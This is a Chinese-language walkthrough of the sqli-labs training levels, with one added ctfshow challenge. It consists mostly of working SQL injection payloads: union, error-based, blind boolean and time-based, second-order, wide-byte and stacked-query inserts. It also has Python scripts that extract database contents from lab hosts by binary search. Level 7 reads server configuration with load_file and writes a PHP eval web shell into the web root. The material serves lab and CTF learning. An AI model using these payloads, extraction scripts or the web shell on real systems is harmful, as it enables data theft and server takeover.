Level 1,2,3,4

判断:?id=1'and 1=2 --+
判断字段数:?id=1'order by 4 --+
?id=-1'union select 1,2,3 --+
判断数据库名:?id=-1'union select 1,version(),database() --+
注表名:?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+
注字段名:?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' --+
注数据:?id=-1'union select 1,2,group_concat(id," ",username," ",password) from users --+

2是数字类型的,不需要闭合

3用 ') --+闭合

4用") --+闭合

Level5.6报错注入

数据库名:
?id=1'union select 1,count(*),
concat((select database()),"==",floor(rand(0)*2)) as a 
from information_schema.tables group by a --+
获取数据表的数量:
?id=1'union select 1,count(*),
concat((select count(table_name) from information_schema.tables where table_schema='security'),"==",floor(rand(0)*2)) as a 
from information_schema.tables where table_schema='security' group by a  --+
表名:
?id=1'union select 1,count(*),
concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),"==",floor(rand(0)*2)) as a 
from information_schema.tables where table_schema='security' group by a  --+
字段名:
?id=1'union select 1,count(*),
concat((select column_name from information_schema.columns where table_name='users' limit 0,1),"==",floor(rand(0)*2)) as a 
from information_schema.tables where table_schema='security' group by a  --+
数据:
?id=1'union select 1,count(*),
concat((select concat(id," ",username," ",password) from users limit 0,1),"==",floor(rand(0)*2)) as a 
from information_schema.tables where table_schema='security' group by a  --+

6用双引号闭合

Level7

用load_file函数读取Apache配置文件获取网站绝对路径,然后传一句话上去

?id=1'))and length((select load_file('/etc/apache2/sites-enabled/000-default.conf')))>100 --+
#load_file()用于读取文件
#apache:/etc/apache2/sites-enabled/000-default.conf
#nginx:/etc/nginx/nginx.conf
#获取到绝对路径为/var/www/html
import requests
​
# Boolean-based blind extraction of the load_file() result, one character
# per outer iteration (positions 1..99). Each position is found by binary
# search over printable ASCII (32..127); every probe is one GET to the lab
# host and the oracle is whether "You are in" appears in the response body.
# Roughly seven probes are needed per character (log2 of a 96-value range),
# so a run emits several hundred near-identical requests that differ only
# in the {i} and {mid} values — a distinctive pattern in web-server logs.
for i in range(1, 100):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        # substring(..., {i}, {i}) asks for i characters, but ascii() only
        # reads the leftmost one, so this behaves like a length-1 slice.
        url=f"http://192.168.2.54/Less-7/?id=1'))and ascii(substring((select load_file('/etc/apache2/sites-enabled/000-default.conf')),{i},{i}))>{mid} --+"
        # Oracle string absent -> code point <= mid; present -> code point > mid.
        if not requests.get(url).text.__contains__("You are in"):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    # The loop exits with left == right == mid, the recovered code point.
    print(chr(mid),end="")
?id=-1')) union select 1,2,'<?php @eval($_POST[shell]); ?>' into outfile '/var/www/html/Less-7/eastjun.php' --+

然后访问eastjun.php不会出现404就成功了,用蚁剑进行连接就可以了

(要去目录下把文件夹访问权限改一下,chmod 777 /var/www/html/Less-7,不然导出不会成功)

Level8 Bool盲注

测试:?id=1'or 1=1--+
数据库长度:?id=1'and length(database())>8 --+
数据库名:?id=1'and ascii(substring(database(),1,1))>114 --+
(security)
#写脚本进行注入
import requests
# Boolean-based blind extraction of database(), positions 1..8 (the prose
# above already established a length of 8). Binary search over printable
# ASCII 32..127; the oracle is the marker string "You are in..........."
# in the response body.
for i in range(1, 9):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        # ascii() uses only the leftmost character of substring(), so the
        # length argument {i} is effectively 1.
        url=f"http://192.168.2.54/Less-8/?id=1'and ascii(substring(database(),{i},{i}))>{mid} --+"
        # Marker absent -> code point <= mid; present -> code point > mid.
        if not requests.get(url).text.__contains__("You are in..........."):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    # Exits with left == right == mid; print the character without a newline.
    print(chr(mid),end="")
#注表名:
import requests
# Same boolean oracle as above, applied to the comma-joined list of table
# names in the 'security' schema, positions 1..99. About seven GETs per
# character; the requests differ only in {i} and {mid}.
for i in range(1, 100):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.54/Less-8/?id=1'and ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema='security'),{i},{i}))>{mid} --+"
        # Marker absent -> code point <= mid; present -> code point > mid.
        if not requests.get(url).text.__contains__("You are in..........."):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    # Exits with left == right == mid, the recovered code point.
    print(chr(mid),end="")

Level9,10时间盲注

?id=1'and if(1=1,sleep(10),1)--+
#写脚本进行注入
import requests
import time
​
# Time-based blind extraction of database(), positions 1..8. The oracle is
# response latency rather than page content: the payload calls sleep(1)
# when the guessed bound holds, and the elapsed wall time is compared with
# that one-second threshold. Probes whose network latency alone approaches
# 1 s would be misclassified; the threshold equals the sleep duration, so
# there is no margin.
for i in range(1, 9):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.54/Less-9/?id=1'and if(ascii(substring(database(),{i},{i}))>{mid},sleep(1),1)--+"
        start=time.time()
        # The boolean returned by __contains__ is discarded; only the timing
        # is used. timeout=5 makes requests raise on a stalled probe, which
        # would abort the whole run rather than retry.
        requests.get(url, timeout=5).text.__contains__("You are in...........")
        t=time.time()-start
        # Under one second -> sleep did not fire -> code point <= mid.
        if t<1:
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    # Exits with left == right == mid, the recovered code point.
    print(chr(mid),end="")
#注表名
import requests
import time
​
# Time-based variant of the table-name extraction: same group_concat()
# target as the boolean script above, positions 1..99, but the oracle is
# whether the request took at least one second (sleep(1) in the payload).
for i in range(1, 100):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.54/Less-9/?id=1'and if(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema='security'),{i},{i}))>{mid},sleep(1),1)--+"
        start=time.time()
        # Return value ignored; only the elapsed time is used. timeout=5
        # turns a stalled probe into an exception that ends the run.
        requests.get(url, timeout=5).text.__contains__("You are in...........")
        t=time.time()-start
        # Under one second -> sleep did not fire -> code point <= mid.
        if t<1:
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    # Exits with left == right == mid, the recovered code point.
    print(chr(mid),end="")

10把闭合方式改为双引号

Level11,12

数据库名:
passwd=&uname=admin'and 1=2 union select version(),database()#
表名:
passwd=&uname=admin'and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'security'#
报错注入:
passwd=&uname=admin'and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

12用双引号闭合

Level13.14报错注入

passwd=admin&uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),1) --+

14用双引号闭合

Level15,16

Bool盲注

passwd=&uname=a'or length(database())>10--+

Level16

时间盲注

passwd=1&uname=admin")and if(length(database())>0,sleep(1),1) --+

Level17

报错注入

uname=admin&passwd=123456'and updatexml(1,concat(0x7e,database(),0x7e),1)--+

Level18.19

UA注入和Header注入,用Hackerbar把UA改一下就行了

EastJun' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1='1

Level20,21

用admin+123456登录一下,登录不了去Level17改密码

然后用HackerBar改Cookie

uname=EastJun' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1='1

21再加一层Base64

22闭合方式为双引号

Level23

用正则表达式过滤了#和--,用单引号闭合

?id=-1'union select 1,2,'3
?id=-1'union select 1,database(),'3
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users
?id=-1'union select 1,(select group_concat(id,username,password) from users), '3

Level24

二次注入

先注册admin'#,密码随意

然后修改密码,admin的密码就会被修改

主要原因是注册时php对数据中的特殊字符进行了转义,转义完直接存储到数据库中,数据库将\'识别为',第二次查询时会执行sql语句

也是可以注出数据的,就是比较麻烦

(2020.4.8:ctfshow上线了sqli-labs,写了个脚本把flag注出来了,因为懒得单独发个文章就直接把脚本放在这里了)

import requests
import time

# Base URL of the hosted challenge instance (the instance id is specific to
# this write-up's session).
url = "http://5b06fff6-e47a-4fa6-9653-adc081ddc256.challenge.ctf.show:8080/"

# Second-order (stored) injection with a timing oracle, positions 1..99 of
# the flag4 column. Every probe performs three POSTs in a fresh session:
# register an account whose username carries the payload, log in as it,
# then submit a password change. Per the explanation above, the stored
# username is presumably re-used in the password-change query, so sleep(1)
# fires there and only the third request is timed. Side effect worth
# noting: each probe creates another user record containing a SQL fragment,
# which presumably persists server-side — several hundred such accounts
# per run are an obvious forensic artifact.
for i in range(1, 100):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        session = requests.session()
        uname = f"admin'and if(ascii(substring((select group_concat(flag4) from ctfshow.flag),{i},{i}))>{mid},sleep(1),1)#"
        data = {
            "password": "123456",
            're_password': '123456',
            'username': uname,
            "submit": "Register"
        }
        # Step 1: registration stores the payload-bearing username.
        session.post(f"{url}login_create.php", data=data)

        data = {
            "login_password": "123456", 'login_user': uname
        }
        # Step 2: authenticate as that account (not timed).
        session.post(f"{url}login.php", data=data)
        data = {
            "current_password": "123456",
            "password": "123456",
            "re_password": "123456",
            'login_user': uname,
            "submit": "Reset"
        }
        # Step 3: the only timed request; timeout=5 raises on a stalled
        # response and would abort the run.
        start = time.time()
        session.post(f"{url}pass_change.php", data=data, timeout=5)
        t = time.time() - start
        # Under one second -> sleep did not fire -> code point <= mid.
        if t < 1:
            right = mid
        else:
            left = mid + 1
        mid = (left + right) // 2
    # Exits with left == right == mid, the recovered code point.
    print(chr(mid), end="")
#2021.4.9

Level25,25a

将and和or换成了"",用双写可以绕过,information那里有个or,要双写

25a为纯数字,不需要闭合

?id=1'anandd 1='1
?id=-1'union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema = 'security

Level 26,26a

报错:?id=1'^(updatexml(1,concat(0x7e,database(),0x7e),1))^'1
盲注:?id=1'^(length(database())>5)^'1
%0a代替空格:?id=1'anandd%0a1='1

Level27

报错:?id=1'^(updatexml(1,concat(0x7e,database(),0x7e),1))^'1
?id=1'^(updatexml(1,concat(0x7e,(seLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1))^'1
?id=1'^(updatexml(1,concat(0x7e,(seLect(group_concat(username,password))from(users)),0x7e),1))^'1
?id=1'and(extractvalue(1,concat(0x7e,(seLect(concat(username,',',password))from(users)where(id=1)),0x7e)))and'1'='1

Level27a

盲注(异或):?id=1"^(length(database())>10)^"1
(?id=1"^1^"1返回为True,?id=1"^0^"1返回为False)
盲注(或):?id=0"||length(database())>10="1
%0a代替空格:?id=0"uNion%0aseLect%0a1,2,"3

Level28,28a

尝试报错注入,但是并没有什么用,盲注还是可以的

报错:?id=1'^(updatexml(1,concat(0x7e,database(),0x7e),1))^'1
盲注:?id=1'^(length(database())>10)^'1
?id=0'||(length(database())>5)='1

Level29

报错注入:?id=0'||(updatexml(1,concat(0x7e,database(),0x7e),1))^'1
过滤空格用括号代替:
?id=0'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),0x7e),1))^'1

Level30

盲注:?id=0"||(length(database())>10)="1

Level31

普通的注入:
?id=-1")union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
报错注入:
?id=1"^(updatexml(1,concat(0x7e,database(),0x7e),1))^"1
?id=1"^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='security'),0x7e),1))^"1

Level32,33宽字节注入

引号被转义,在引号%27前面加了个反斜杠%5c,可以用宽字节注入,在%5c前加上一个ascii码大于128的字符,mysql会认为这是一个汉字,所以只要在引号前加上%81就能吃掉这个反斜杠%5c,使得后面的引号变得有意义,后面注字段名的时候需要用到引号可以用16进制绕过

?id=-1%EF' union select 1,2,database() --+
?id=-1%81' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=-1%EF' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=database() --+
?id=-1%EF' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

Level34

还是宽字节,但是用的是POST,和GET方法不太一样,%df传不上去,用�代替%df可以注入

passwd=a&uname=admin�'or 1=1#

35不需要闭合,直接注,需要引号的时候用16进制绕一下

36和32一样

37和34一样

Level38,39,40 ,41堆叠注入

可以让mysql执行多条sql语句,用分号闭合,比如下面这个执行了他就把这条数据插入到数据库中了

?id=-1';insert users values(15,"eastjun","123456");--+

再去查id=15这条数据的时候就能查到eastjun的数据

39是不需要闭合的堆叠注入

?id=15;insert users values(16,"westjun","123456");--+

40的闭合方式为')

?id=1');insert users values(17,"northjun","123456");--+

41不需要闭合

?id=18;insert users values(18,"southjun","123456");--+

Level42,43

是要我们登录,用万能钥匙'or 1=1--+确认注入点在password

password中输入反斜杠会有报错的回显,可以用报错注入,也有堆叠注入可以用

login_password=123456';insert users values(15,"eastjun","123456");--+&login_user=admin&mysubmit=Login

43用')闭合

Level44,45

44,45与42,43的区别在于报错不回显,可以用盲注,堆叠注入也可以用

Level46

这里是传入一个名叫sort的参数,用于排序,源码中用了order by id,但是并没有对id进行任何的过滤,而且错误会回显,可以用报错注入,也可以用盲注:

?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

Level47

报错注入,然后需要闭合

?sort=1'and updatexml(1,concat(0x7e,database(),0x7e),1)%23

Level48,49

错误不回显,要用盲注,比较简单的就时间盲注:

?sort=if(length(database())>0,sleep(1),1)

还可以用Bool盲注,rand(1=1)和rand(1=2)返回的顺序不同:

?sort=rand(length(database())>0)

这关报错的时候不会显示任何东西,可以用?sort=\试一下,这里可以用这个特点进行盲注

?sort=updatexml(1,if(length(database())>0,1,0x0),1)

49是字符型,要用单引号闭合

Level50,51,52,53

和46,47,48,49一样,然后这四个都可以用堆叠注入

Level54,55,56,57

和Level1一样,2是用)--+闭合,3是用')--+闭合,4是用双引号闭合

Level58

?id=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e),1) --+
​
?id=1'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'A63905CZCP'),0x7e),1) --+
​
?id=1'and updatexml(1,concat(0x7e,(select secret_21WB from A63905CZCP),0x7e),1) --+

Level59

?id=updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1)
​
?id=updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='VY8ZTG6ZIU'),0x7e),1)
​
?id=updatexml(1,concat(0x7e,(select secret_BYC8 from VY8ZTG6ZIU),0x7e),1)

Level60,61

60闭合方式为"),61闭合方式为'))

Level62,63,64,65

import requests
​
# Boolean-based blind extraction of the first 10 characters of the
# group_concat()'d table names for the current schema. Unlike the earlier
# scripts the result is accumulated in `table` (it is interpolated into the
# payloads below) instead of being printed character by character. The
# oracle is the marker "Angelina" in the response body; each probe is one
# GET, about seven per character.
table=""
for i in range(1, 11):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.24/Less-62/?id=1')and ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},{i}))>{mid} --+"
        # Marker absent -> code point <= mid; present -> code point > mid.
        if not requests.get(url).text.__contains__("Angelina"):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    # left == right == mid here; append the recovered character.
    table+=chr(mid)
print(table)
​
# Second stage: recover one column name (11 characters) of the table found
# above. `limit 2,1` selects the third column (offset 2) of that table; the
# recovered name is kept in `column` for the final stage. Same "Angelina"
# oracle and binary search as the previous loop.
column=""
for i in range(1, 12):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.24/Less-62/?id=1')and ascii(substring((select column_name from information_schema.columns where table_name='{table}' limit 2,1),{i},{i}))>{mid} --+"
        # Marker absent -> code point <= mid; present -> code point > mid.
        if not requests.get(url).text.__contains__("Angelina"):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    # left == right == mid here; append the recovered character.
    column+=chr(mid)
print(column)
​
# Final stage: read 24 characters of the single value `column` from `table`
# (both names come from the two loops above, so this block depends on them
# having run first). Same "Angelina" oracle; output is printed one character
# at a time without a trailing newline.
for i in range(1, 25):
    left = 32
    right = 127
    mid = (left + right) // 2
    while left < right:
        url=f"http://192.168.2.24/Less-62/?id=1')and ascii(substring((select {column} from {table}),{i},{i}))>{mid} --+"
        # Marker absent -> code point <= mid; present -> code point > mid.
        if not requests.get(url).text.__contains__("Angelina"):
            right = mid
        else:
            left = mid+1
        mid = (left + right) // 2
    # Exits with left == right == mid, the recovered code point.
    print(chr(mid),end="")
​

63用单引号闭合,64用))闭合,65用")闭合
